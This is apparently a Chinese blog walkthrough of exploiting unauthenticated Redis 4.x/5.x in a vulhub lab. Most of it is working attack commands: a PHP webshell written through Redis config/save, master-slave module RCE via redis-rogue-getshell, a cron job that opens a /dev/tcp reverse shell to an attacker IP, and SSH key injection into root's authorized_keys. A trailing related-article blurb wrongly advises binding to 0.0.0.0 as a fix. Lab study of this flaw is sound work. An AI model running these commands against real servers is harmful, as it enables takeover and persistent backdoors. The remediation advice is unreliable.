Redis未授权访问

已于 2024-05-12 20:44:25 修改
阅读量1.4k 收藏 16
点赞数 13
文章标签: 安全 web安全
于 2024-05-09 00:07:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/npc88888/article/details/138589216
版权

一、漏洞描述

Redis未授权访问 因配置不当可以未经授权访问,攻击者无需认证就可以访问到内部数据。

1. 导致敏感信息泄露

2. 执行 flushall 可清空所有数据

3. 通过数据备份功能往磁盘写入后门文件(webshell、定时任务)

4. 如果Redis以root身份运行,可以给root账户写入SSH公钥文件,免密码登录

Redis主从复制RCE

在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的

漏洞的产生条件有以下两点:

(1) Redis绑定在 ip :6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网

(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务

二、影响版本

数据库版本 4.x / 5.x 

三、影响组件

Redis 服务器

四、漏洞判断

端口探测

nmap -v -Pn -p 6379 -sV: 192.168.116.149#-v:显示过程   -Pn:no ping   -sV:版本探测

发现 6379 端口开放,版本为 4.x 存在未授权访问漏洞

五、漏洞利用

靶机ip:192.168.116.149

攻击机ip: 192.168.116.151

1、环境搭建
靶机环境搭建:
安装docker

sudo apt-get update
sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"

 安装docker

sudo apt-get update

sudo apt-get install docker-ce

 安装vulhub

vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose (github.com)

下载这个然后拉去虚拟机解压 

打开环境

docker-compose up -d      

docker-compose ps       

在后台模式下启动和运行一个或多个容器

查看当前运行的容器

攻击机安装 redis-cli 远程连接工具 

wget http://download.redis.io/redis-stable.tar.gz   
tar -zxvf redis-stable.tar.gz    
cd redis-stable      
make        

将 Redis 客户端命令行工具 redis-cli 的可执行文件复制到 /usr/bin/ 目录下,使其成为系统可执行文件之一

cp src/redis-cli /usr/bin/
redis-cli -h

2、写入webshell

连接redis

 写入webshell

config set dir /tmp    
config set dbfilename shell.php
set webshell "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
save
#因为靶场没有开启web端口无法直接上传木马文件,所以用写入shell文件的方式添加后门
#写入文件内容时添加几个换行,是因为redis写入文件时会自带一些版本信息,若不换行可能会导致木马无法正常执行

查看靶机,发现webshell已经写入了

docker ps        查看ID

docker exec -it ID /bin/bash        到环境里面

3、使用py脚本执行远程命令
安装py脚本

git clone GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module

cd redis-rogue-getshell/RedisModulesSDK/exp
make 

./redis-master.py -r 192.168.116.149 -p 6379 -L 192.168.116.151 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"
执行命令whoami

 4、写定时任务反弹shell
攻击机开启监听

 因为权限问题我没能利用这个

redis-cli -h 192.168.116.149 -p 6379

set xxx "\n\n*/1 * * * * /bin/bash -i>& /dev/tcp/10.1.1.100/4433 0>&1\n\n"

config set dir /var/spool/cron

config set dbfilename root

save

等待一分钟左右就会收到反弹shell了:
5、写SSH公钥

在攻击机(redis客户端)中生成ssh公钥和私钥,密码设置为空

进入/root/.ssh目录: 将生成的公钥保存到1.txt:(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

连接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis(使用redis-cli -h ip命令连接靶机,将文件写入):cat 1.txt | redis-cli -h 10.11.45.150 -x set crack


更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh

设置上传公钥的备份文件名字为authorized_keys:CONFIG SET dbfilename authorized_keys

保存并退出:

此时在攻击机上使用SSH免密登录靶机,利用私钥成功登入redis服务器:


原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775

 利用主从复制RCE(Python脚本)也直接看这篇

六、漏洞修复

升级版本

我看就这样吧
关注
  • 13
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
redis_授权访问
scu_hacker博客
01-13 7745
本文介绍redis授权访问的4种利用方式
Redis 授权访问
qq_61553520的博客
05-17 518
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
授权访问Redis授权访问漏洞
qq_68163788的博客
05-08 941
授权访问是指在Redis数据库中,经过身份验证或授权的情况下访问数据库的行为。Redis是一种流行的开源内存数据库,用于存储数据并提供快速访问。如果Redis实例经过适当的安全配置,攻击者可以利用这一漏洞,访问敏感数据,修改数据或甚至破坏数据库。授权访问可能导致数据泄露、数据损坏和系统崩溃等严重后果。为了防止授权访问,管理员应该采取必要的安全措施,例如设置访问控制列表、使用密码进行身份验证和定期更新Redis安全配置。通过加强安全措施,可以有效防止授权访问Redis数据库造成的风险。
redis授权访问
最新发布
san3144393495的博客
06-15 1243
redis非关系型数据库。
redis授权访问
尘玥的故事
06-13 309
redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 redis 以及读取 redis 的数据。
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3122
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2117
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis授权访问漏洞的利用
hackzkaq的博客
11-16 158
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis授权访问漏洞。利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2425
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5432
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值